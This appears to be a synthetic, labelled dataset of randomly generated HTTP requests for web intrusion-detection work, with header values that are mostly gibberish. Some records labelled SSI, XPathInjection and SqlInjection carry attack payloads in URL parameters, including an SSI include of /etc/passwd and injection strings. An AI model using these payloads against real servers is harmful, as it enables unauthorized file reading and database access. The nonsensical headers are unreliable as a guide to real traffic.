Warning: 450 100.128.62.52 "l3taFui4sbggwllhtg8" "Mon, 13 Jun 05 09:06:55 UTC"
X-Forwarded-For: 175.234.36.217
X-Serial-Number: 74970351581
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 122
Start - Id: 7592
class: Valid
POST /JrmF/Oton71Dsyoknor5l/heeieprH/t1nro-dgD/xXJk/da503om8ehr6rqtp.shtml? HTTP/1.1
Content-Length: 298
Content-Language: paotMH,ra9a,csm
Content-Encoding: gzip
Content-Location: http://iqszRs.uk/aiaha/tlei/babg/e0tEbnp0/Itds.pl
Content-MD5: YU1paWxidWxkaWF1OGRvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Sep 06 22:13:27 CET
Last-Modified: Fri, 17 Dec 04 05:17:55 GMT
Host: 167.173.68.20
Connection: nt6nnj
Accept: audio/*
Accept-Charset: x-mac-cyrillic, iso-8859-1, iso-8859-2;q=0.9
Accept-Encoding: deflate;q=0.5, gzip;q=0.5, compress
Accept-Language: a1-y;q=0.3, khn-3StroW;q=0.5, ivAanero-ei4eitoL;q=0.0, igyeeom-asd;q=0.3, n-wcitt0rt
Cache-Control: max-stale
Client-ip: 202.177.178.10
Cookie: ianltteso=e;O0tmorq8?blN;tsothsrn=n1RhdoEtsiedy;zyahcsbhsr=u/e+s(qbody/swdboot.inihA;03b=oyrgf4e6
Cookie2: $Version="765"
Date: Tue, 18 Oct 05 05:56:26 UTC
ETag: "l-.7fktG3Qt_S4rR"
Expect: uohn=cmnystid
From: ceSow@tr4ceDrD.be
If-Modified-Since: Wed, 04 Feb 09 07:55:55 UTC
If-Unmodified-Since: Sun, 21 Sep 08 04:16:49 GMT
If-Match: *
If-None-Match: "S0MeYo5EcsFzwWntD"
If-Range: "B6MSDVGUqtn50TBow7"
Max-Forwards: 663
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="g4OAase"
Authorization: Digest uri=http://2wo0.com/Aseenae/53arc5mi/stset.pdf
Range: -984
Referer: http://www.toebsEA.biz/2otoMeo.msf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.5 (compatible; Konqueror/6.9; Solaris; uhrB8h0; rbfWetjq; herehcdt)
UA-CPU: Sparc
UA-Disp: 504,612,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 449x1634
Via: HTTP/9.0 43.152.133.84, n26N/8.9 www.mo2ees.jpg, 9.1 146.154.180.152
Transfer-Encoding: deflate
Upgrade: Trcl/0.4, Iktrb/8.6, ydcebx/8.7, rfe/6.1
Warning: 990 www.kpmht.gif "roigoeiiehg" 
X-Forwarded-For: 43.133.9.20
X-Serial-Number: 426343709
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

kMzr=sh7oe3j&TtImehsotyehi=passwdtgd&VchildXdeleteY8mac4=qinnewnbinepin6e&dewcef1=olsl0lbbepis&6t9tachor4u=mor1eal&JzO8=eaGLdh-ml&r0A=5690&5tI=020dbpjb9ph&At2hNhatgdlnr=3reerx&AngdCbia=r'%divt 04phee&ec3eAdsjqi=e2eubie&dag6oazl2ihfq=9467128&SI=-ro&0IrHBcGusrCu=formar&Y@qicJM=ntobjectlowlouaerS

End - Id: 7592
Start - Id: 32327
class: Valid
GET /g4smK3UtHTQ/cP0OUznFa/t2p_gGu5AaEe/mlIkGl/tUY8A/oneE5rdaaoacehihhmce/vaP34z74ElCy1OOI8_/hutrn7/BVJtPEGu6e/rxMUE5qA/yeshr/oHfNB.aspx? HTTP/1.0
Host: www.4n5tks.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: teBx-t
Cache-Control: only-if-cached
Client-ip: 155.74.53.10
Cookie: ssesrsn4npmxnid=dnVcudFSfE;nraueo0tdmomab=442414;V5.YXnP6N=o@ilogNiay1andte;sWiEstopdh=sikiihTfofluo
Cookie2: $Version="9"
Date: Tue, 01 Mar 05 19:03:46 GMT
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Mon, 11 May 09 03:41:47 UTC
If-Unmodified-Since: Thu, 29 Dec 05 22:09:11 GMT
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Tue, 01 Jan 08 16:32:54 GMT
Max-Forwards: 06
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Basic NmxpRnJkbDplQWU2
Range: -68,-771672
Referer: http://onNifo5.st/3eKGcap/nioO/arn5ne3d.txt
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: jeurxio/2.0.4.0
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: HTTP/6.6 www.tiydis.htm:3366, 1.0 www.en0rorO1.tiff, HTTP/7.2 250.255.77.19:18
Transfer-Encoding: identity
Upgrade: gETaD/6.4, von/5.0, mwsig/3.5
Warning: 297 www.heuiteE.htm:96 "afr3tepTtiirwedmhdy" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 13915181953096
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32327
Start - Id: 39653
class: SSI
GET /aulij3Lros/frVoxGNh0VaMk8Ry/tnaad/zecanimRv4nbcn2/3oSZT/netbguzo/B5tlocation.6.exe?ddfr=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&nwpljkvre8n=1618586462&r8A2dwSO=2nndmearer7Cboti HTTP/1.1
Host: www.sla9uly.st
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.5, identity;q=0.3, deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: dzO_W=hwvDiWxy
Cookie2: $Version="2"
Date: Sat, 01 Mar 08 23:55:22 CET
ETag: "2rjOFZbB2mX8bG8_bS"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Sat, 13 Aug 05 22:07:48 CET
If-Unmodified-Since: Sat, 22 Aug 09 11:19:34 GMT
If-Match: *
If-None-Match: "aI2_v0pUz3MLYh0SS"
If-Range: "H6HZBOgvt6JutE6"
Max-Forwards: 86
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: http://AiedeOH.biz/vsksIbec/hceu8awi.wav
TE: trailers,trailers,deflate;q=0.5
Trailer: Authorization
User-Agent: Mozilla/6.2 (compatible; stdrE; Solaris; dprtE37m; aNuaixa)
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 587x0700
Via: rsc/4.8 www.Oasndl.css, 3.4 170.84.59.159
Transfer-Encoding: deflate
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39653
Start - Id: 33597
class: Valid
POST /wZs2KoPJh8/fh8lbnslann7ahgaax/Sx@ccL/n08uxomht1pYa/rva5haelnu4h3NDls/t4hYujUBjXB/BnRK3x7V1KW/FzYw/bRq5WSYQNGwVVQ1c3w.bin? HTTP/1.1
Content-Length: 85
Content-Language: ntp5i3m,sn,ygptpi7T
Content-Encoding: deflate
Content-Location: /oitjdce/oiba/vie2sh/7E9wutHn/zi4ee.asp
Content-MD5: c2Rzb3dOZXJlbmZwVGViZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 May 08 03:45:16 GMT
Last-Modified: Sat, 10 Oct 09 23:09:49 CET
Host: 59.110.53.150
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-eineT, eT-sua2Efhl
Cache-Control: no-cache
Client-ip: 61.238.104.160
Cookie: beci=ou?;1f=oto;connectkFd=3986045;Hconnect2up04HexecKpD=dtAthqro;e4hritnt4bpz6pa=Epr
Cookie2: $Version="48"
Date: Fri, 11 Dec 09 06:43:24 GMT
ETag: W/"N4UJhc1GS4VrAFF4tlJ"
Expect: sroeypL=emhe3ea
From: nn7tsoea@daqnal.net
If-Modified-Since: Sun, 06 Jun 04 24:20:14 GMT
If-Unmodified-Since: Wed, 12 Oct 05 20:39:37 UTC
If-Match: *
If-None-Match: "BAB0fpAtRKRDWEA"
If-Range: Tue, 27 Dec 05 10:21:05 UTC
Max-Forwards: 200
MIME-Version: 7.0
Pragma: ianlpzc=b
Authorization: Digest uri=/ezslta/Uruhhmte/atviwoe/HfiEn.tiff
Range: -02392,-294
Referer: http://jtet.de/Dtrshs/ennumh.ace
TE: chunked;q=0.2
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 7.9; mi-we; rv:5.2.2) Gecko/03266462
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1474x735
Via: uJeqm/7.5 www.mauaomr.jpg:777
Transfer-Encoding: eUIh5
Upgrade: inft/8.1, NLdny/6.1, Iat6/2.9
Warning: 893 www.lhbahae.tiff "etmsh" "Tue, 15 Jun 04 22:14:16 CET"
X-Forwarded-For: 203.16.92.234
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

lleZmeEaeldhd=607043&tGm=d22nr&wseL0eikc3bt=15152&os=txglehhtm&nlyuulodn=sol&eeu=y2.z

End - Id: 33597
Start - Id: 12162
class: Valid
GET /t5Op1C-MR.shtml?afosA=51&teTnt7aeni=3&rri=hror&in9eeN=niie%24SER+ote&ULnph-5uNrMBuea=9kldz&ateitZcese=koiFz2&ocoarrsosav33SK=nfl0t%3Ako4%3E HTTP/1.1
Host: 44.69.81.144
Connection: aoeS3r
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: 8a='lsad'
Client-ip: 21.246.158.137
Cookie: paeelyt=eu$8c1ritmpo0dit;ntaiNlt=3242354
Cookie2: $Version="8"
Date: Sat, 24 Jan 09 12:03:38 CET
ETag: "F1UNx3ec86UdWlLx"
Expect: 100-continue
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Fri, 26 Feb 10 10:01:30 CET
If-Unmodified-Since: Tue, 18 Jul 06 18:59:11 CET
If-Match: "xneSH0.0pE-fIKq5H6cG"
If-None-Match: "M_1JEIYUcYA3w-8"
If-Range: *
Max-Forwards: 197
MIME-Version: 1.4
Pragma: hhniAti=qoseS
Proxy-Authorization: lert mmeei=fdhn
Authorization: Basic ZTJ0MG41ZDo2b3N1
Range: 807559-8320
Referer: /aljMso6r/ws1eo.html
TE: gzip;q=0.5,trailers
Trailer: Host
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 1.7; Af-ac; rv:9.6.6) Gecko/49446471
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: FTP/9.1 www.vdvmNtd.shtml, 6.6 www.r892a.shtml
Transfer-Encoding: identity
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12162
Start - Id: 19966
class: Valid
GET /ftXaBOPedjE0rfMWJC-h/dctnagyi8o1oduys/eQzBDGFWXb4l/0iiEdupaetct/7TCsUpfbxsrst6.mspx?eei=82&uhHrOsaxwT3d4E=h%7Cht%7Cnottstdinh%28one-o0ki&rFeloaHtyod=cdr&gexqibt0eham=riieygumdstht&59v4tkUcf=92100&otmmoAetk1nutc=e%25iscavhj1&home1UjoGkwindow.openQbb=y&ueqV=491238&eq=01623134 HTTP/1.0
Host: www.2AwyaT.st:3289
Connection: s7cu2l
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, gzip, gzip;q=0.1, deflate;q=0.3
Accept-Language: Terla-04aar, oeapeer-hencs;q=0.0, senRw-rmt
Cache-Control: only-if-cached
Client-ip: 160.212.207.190
Cookie: esikupad4a=gpokr7shutdown7)A
Cookie2: $Version="914"
Date: Sat, 03 Dec 05 13:39:52 UTC
ETag: "fRp.j_Sd1JFJKYu"
Expect: 100-continue
From: ev5k8ia@ptMesO.net
If-Modified-Since: Sat, 09 May 09 20:06:25 UTC
If-Unmodified-Since: Fri, 01 Feb 08 21:09:07 GMT
If-Match: *
If-None-Match: "ckhkDpmpz6KyheJKp"
If-Range: Tue, 25 Aug 09 04:20:01 UTC
Max-Forwards: 7
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic aGJlYXR4c2k6VHIzZg==
Authorization: 3trLna euesp=ntgsRsok
Range: 9-166,607515-,166-662139
Referer: http://www.retz1.fr/e0vq.html
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: sqnAi/5.8.0.2
UA-CPU: StrongARM
UA-Disp: 773,5885,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 772x118
Via: 6.7 119.35.238.109
Transfer-Encoding: compress
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19966
Start - Id: 35612
class: XPathInjection
GET /igyyiohiqatyhiul/d8artm8deetkE/M7e1a/b4GwZ/oN0hX_yHz/ae.jpeg?jax=sfr&1evall_E=i+h+%24ikfgroup+by&BJWg3LA=7++++or+++hu01f7%2Fms%2Faot%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D++++or++0%3D&or=46157148&f2yrer=ku+k HTTP/1.1
Host: 107.197.142.179:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: Cf-Qn;q=0.1, sewem4e-gwgtr
Cache-Control: min-fresh=6799
Client-ip: 117.110.178.233
Cookie: afTm=62;aetsrhef04=tVQEw-HML;teea=e4Doj5C1FvKo;So-p=8gEfg0ae;mksbjc7DSw=eat;it;rumsnes5o5ers=pM8
Cookie2: $Version="102"
Date: Sat, 07 Nov 09 04:37:32 GMT
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: mt02@Hkilog0Etd.org
If-Modified-Since: Sun, 30 Apr 06 07:14:43 UTC
If-Unmodified-Since: Wed, 21 Apr 10 07:05:58 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Dec 05 05:57:20 CET
Max-Forwards: 867
MIME-Version: 4.8
Pragma: 1=Uampieam
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Digest nonce
Range: -430
Referer: /inZdt/ennaF/dtptHes.dll
TE: gzip,chunked,trailers
Trailer: Host
User-Agent: tbH2ecoc (tdWdDhc7t)
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: 3.2 www.shu3.tiff, 3.2 77.225.162.4:7981
Transfer-Encoding: gzip
Upgrade: sivn/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35612
Start - Id: 10321
class: Valid
GET /qMAAy8Ru9_lsz.msf?drma=rrRuZbfTMQA&3atwf=ndo&P.HZvC6Y2UCu=y+oesgroup+by&Roiieoet=%26%3Aonlw%5Cs+aoe%40mhi&dnuvazeoe=niswd+oT&4ebisr=xrmihteneieteiE3ni&eembooAsE1=16881580&rwEnaan4rasueeg=05&5Uqw=9n4ltrxltgtw1N&nym=07584&6qelslei3=t&gn=1&annzc1oovl4sti=472176531 HTTP/1.1
Host: 227.56.121.167
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-7, x-mac-korean;q=0.4, iso-8859-8-i, x-mac-chinesesimp;q=0.2, shift_jis
Accept-Encoding: *;q=0.7
Accept-Language: Snedh-ath;q=0.6, aoeEbe5r-fg;q=0.7
Cache-Control: no-transform
Client-ip: 186.89.249.252
Cookie: tlxk9sfcx0mtrU=2lylsweateieOgaotl;tdocumentn3JtmpGK@V=6ia0oohooI7e;AtrrtqoalhvmBu=9;kimscxrihdv=ecmdib
Cookie2: $Version="56"
Date: Mon, 06 Jul 09 01:08:11 GMT
ETag: W/"EYezGROZhzumkOacy"
Expect: eelex
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Sat, 17 Jan 09 10:44:21 GMT
If-Match: "_BK-rcMwi22BTxR@"
If-None-Match: *
If-Range: Mon, 29 Dec 08 12:06:17 CET
Max-Forwards: 8023
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rfff
Authorization: Digest opaque="shteianm"
Range: 52154-0,154236-049101
Referer: http://hhsno.ch/1rsntu/ayd9dfe/eoiuk/0nkir/srt27le.png
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.6 (Windows; U; Win98 9.6; 6q-on; rv:8.7.3) Gecko/03959093
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.7 www.eHpag1e.gif, 1.5 19.138.147.176:40705
Transfer-Encoding: gzip
Upgrade: pnge/0.2
Warning: 464 www.t6l1.jpeg "rueaeivla7hs" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10321
Start - Id: 9857
class: Valid
GET /4cueir5nhDmmxdx8r1a/eeuueay4o/1PfDl0M1.Q7dki/WebetweenDaexecacmdyxScopy_/oShBrx.uzjGh.js?dtdem5sr=oewlskf2do3si&toutaOoio5=8tsn&nltoghai=yTlhdatiebin&flqN-=333&AvKA.dNW=ri_Q2B7V HTTP/1.1
Host: www.2aepsuewe.ch:80
Connection: eycle
Accept: video/quicktime;q=0.3, video/*;q=0.0, text/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip;q=0.7, compress
Accept-Language: *;q=0.9
Cache-Control: min-fresh=034
Client-ip: 117.106.21.204
Cookie: znhhrejrepwdot=947;VRZEVsrcp4=6weform2 nl;fn=015
Cookie2: $Version="3"
Date: Thu, 13 Jan 05 23:27:02 GMT
ETag: W/"-@51lHPVg3LcenR3M6."
Expect: satevs=iaeudWh;t9isT
From: eysn4@teOuatxl.org
If-Modified-Since: Mon, 15 Oct 07 17:03:54 CET
If-Unmodified-Since: Fri, 17 Jun 05 04:00:16 GMT
If-Match: "h6iHRPtkcXAQX.Ws-oCe"
If-None-Match: *
If-Range: Thu, 29 Nov 07 23:13:45 UTC
Max-Forwards: 88
MIME-Version: 1.8
Pragma: 0=90nawE
Proxy-Authorization: Basic aXMwZW5ibmU6ZW9pZWhnNA==
Authorization: Digest qop=auth-int
Range: -116,600-315,197733-5
Referer: /nss6rnn/i3mNt7e/eIiaunta.nsf
TE: gzip;q=0.8,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.9 (compatible; MSIE 1.3; WinNT; Issz; eriojs)
UA-CPU: MIPS
UA-Disp: 1962,9364,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 803x940
Via: 3.7 www.rbh4e55.jpg, 6.9 www.njoiimte.jpeg
Transfer-Encoding: compress
Upgrade: dsi/0.4
Warning: 812 www.raItj.jpg "oaso85cantolse0N" "Sun, 16 Nov 08 15:47:55 GMT"
X-Forwarded-For: 34.215.180.93
X-Serial-Number: 09946739061718
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9857
Start - Id: 41884
class: SqlInjection
GET /za/1fuBw/ezVrY0S8L4Eqw8SsfN.htm?f0se=tqtaia&cdemrscrossla=3roejgeYltoeNm&includeFq4lemf9d9Z=ehZn8nWVW&2ecohd=%27++++OR+++++%27it%27+++%3D+++++%27ot%27%2B%274akod%27&A1tovndter5=4272577619&ag=lounionmts0oo%2FEewhiUyR&servicesm-VYc=shutdownmtn%28r%3Ad%3A&eeriHeiah3far=hsier&LxkaF=725&ktleke05is=ey%5C5beduht&rnzMtEg=rMiac&uddPmemehelrn=d&UNG0fEUZv@=bnqOs&tiscuwwvrns=i HTTP/1.0
Host: www.mvelspdoo.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-7;q=0.7
Accept-Encoding: deflate;q=0.6, gzip, compress
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: linenoLiim=7l;Qto=emFeRDXz2VEW;96GDehlayenlnqv=me9ariaulo1;geErnH3esao=iYFcdF;ioMRD4w0KZ=86654;tithoidt=where ]it0nrwl:
Cookie2: $Version="03"
Date: Tue, 17 Feb 04 16:16:34 GMT
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: 100-continue
From: elee@hieitj.de
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 6
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: NTLM c2VzdHdIMWRlZXVpaWloZUl5bmlockdsZnJJb2FjZWdhdQ==
Range: 2764-93323,17883-91
Referer: /serx0ae/oLesg/rpttit/nbtebM.php4
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 3.5; 2e-vi; rv:8.0.2) Gecko/69160439
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.4 www.mezydhs.css, HTTP/9.0 94.9.254.44
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41884
Start - Id: 13290
class: Valid
GET /tZ-jakHHeOmmjiAO5o/XCsamfromMfmdallt/rerblf0nxrLes7asW/lktdcqwu5ttet/75ou@S/snVk3MJvFu-AqwCWzy/swhdnt4yikrvlis47eeN/93xvbIEJ/htacces6q/5tYzaset8dwrsepesio/avc9hipmtgsg8ee/soiTyeotlM.gif?tuff=50160110 HTTP/1.0
Host: 98.156.150.165
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 3st4fwB-ihef
Cache-Control: max-age=4
Client-ip: 85.166.25.79
Cookie: den=sWkb;0V4itqcexp_UN=einputetie0ZScvtl;eRaer=misssei;dSip=d2iYGE-G;a6crdY8=51617935
Cookie2: $Version="04"
Date: Mon, 10 Mar 08 06:53:10 UTC
ETag: "JHPJJ67h12PXmjp3w2"
Expect: 100-continue
From: olyttEr@ifpLetppe.uk
If-Modified-Since: Wed, 23 Jun 04 24:01:58 GMT
If-Unmodified-Since: Fri, 20 Jan 06 21:26:20 CET
If-Match: "peMPWI3.a1TcyRM"
If-None-Match: *
If-Range: "823D.J43cB2dVs-Mj"
Max-Forwards: 914
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=De0d4dFe
Range: 91-,95-043440
Referer: /inR3va/nrRR/etkea/3fa0e/syelP.mdb
TE: gzip,trailers
Trailer: Pragma
User-Agent: slElne (1tKgbD7vM; qiAYWX; iQ1iBMoP; tgYB70)
UA-CPU: Sparc
UA-Disp: 3770,9157,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1944x150
Via: u8iNT/4.2 144.36.51.67, FTP/5.4 www.nfH5.jpg, 9.7 152.32.118.195
Transfer-Encoding: 9icrt
Upgrade: tys/4.9, uRbUmS/4.9, mus/8.8, CpW/2.8, hhur/6.2
Warning: 019 www.1oria.htm "ucRbce" "Tue, 19 Jun 07 17:16:42 CET"
X-Forwarded-For: 152.52.206.24
X-Serial-Number: 2110158231977
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13290
Start - Id: 6300
class: Valid
PUT /eoInXcYD0SqN7location/rLkImXoQlV-dSH/htYcrrdspded/NruUu/ObP.htm? HTTP/1.1
Content-Length: 174
Content-Language: EUMs,3gheyh
Content-Encoding: identity
Content-Location: /1ferarsr.jsp
Content-MD5: bnB4aXNmaFV0dGVtbnlhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Aug 09 16:21:23 UTC
Last-Modified: Fri, 20 Feb 09 18:54:43 CET
Host: 207.225.146.5:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: reE-osaMIW, a9iold-riwtawye
Cache-Control: min-fresh=7
Client-ip: 99.32.69.228
Cookie: rmaO=69446940;sTCt4tXa=1353708
Cookie2: $Version="1"
Date: Mon, 29 Jun 09 19:22:59 CET
ETag: W/"CRrlvqSg_oS8jZDr"
Expect: Eyilas=df2aoe
From: eOapi@ngtn7he.gov
If-Modified-Since: Tue, 02 Mar 04 15:35:19 UTC
If-Unmodified-Since: Tue, 30 Oct 07 03:49:54 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Feb 10 02:01:15 GMT
Max-Forwards: 922
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: ut4s fpas=rrsds
Range: 10-,-849357
Referer: http://csmr.biz/deeeeo/lir09/Lrwcin/dihaor.php3
TE: trailers
Trailer: From
User-Agent: iTzCfO3-X http://www.d6ng0t.cz
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 475x5862
Via: 4.2 91.181.128.139, 2.6 www.4frv3a.html
Transfer-Encoding: identity
Upgrade: d8e5it/2.2, jr4e/7.0, easd/8.8, rOfnn/0.5, NeOe/4.5
Warning: 155 www.3r0o.gif "onb5edtw" "Tue, 10 Oct 06 03:14:15 UTC"
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ge5fsnd59w=Fo-msunion~ewgete $I[eRp0&om.BRBVN=ut8gr&sstw=t]cT?sYaa&ichRr=58880&pbDy=272093682&0aHhnccBJSeG5Z=Y01paainu&aNnsnpnhst9=ldrNe&nHto=dAimA&bhisc=8usoRgnlem

End - Id: 6300
Start - Id: 49625
class: XPathInjection
GET /tFRjJCJ9/oacce7i2js3mnhP.exe?mDlRd8j=tsts%2BEocr+neodelete&yOCLnc=fbictitpipl&eme=eeebtczntiso1suoes&eepEIemiIhn=nrhfp&Emu0a1firoln=uservicesHrcpbL&ekrad9f=4nsGes+rsam&1ts0clsxiUc1=di%27%5D++%7C++++P++++%7C++%2F%2Fuser%5B+++name%2Ftext%28++%29++++%3D+++%27lNa HTTP/1.1
Host: 39.234.174.142
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.2, koi8;q=0.9, iso-8859-8, windows-1258, iso-8859-8;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 228.117.156.249
Cookie: dmrbndwexi=hcyO;og90bi=Msaeinosi;edtbUsS=e'stsyAeS;bodyY2YTTiframeda=g6iHsysfmetaUs;jKOX=6468345432;h5pXOfS=mnGX-_4LYadm
Cookie2: $Version="34"
Date: Mon, 21 Jul 08 01:37:24 GMT
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sun, 29 Aug 04 13:14:20 GMT
If-Unmodified-Since: Sun, 26 Jun 05 24:22:49 CET
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 6
MIME-Version: 0.2
Pragma: i=nflf
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Digest uri=/q5hlee0.doc
Range: 31-025167,936-84
Referer: /aatrnkgc/npnkjs.asmx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: sgrntxth (nQ3mYbE4E; gj1m9XG-S; oZYszN; d@SK7E; snm-nMoRX0)
UA-CPU: StrongARM
UA-Disp: 177,5703,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 8.2 128.27.33.87, 2.8 73.125.141.27
Transfer-Encoding: tedco; rtyeddya=lochU
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
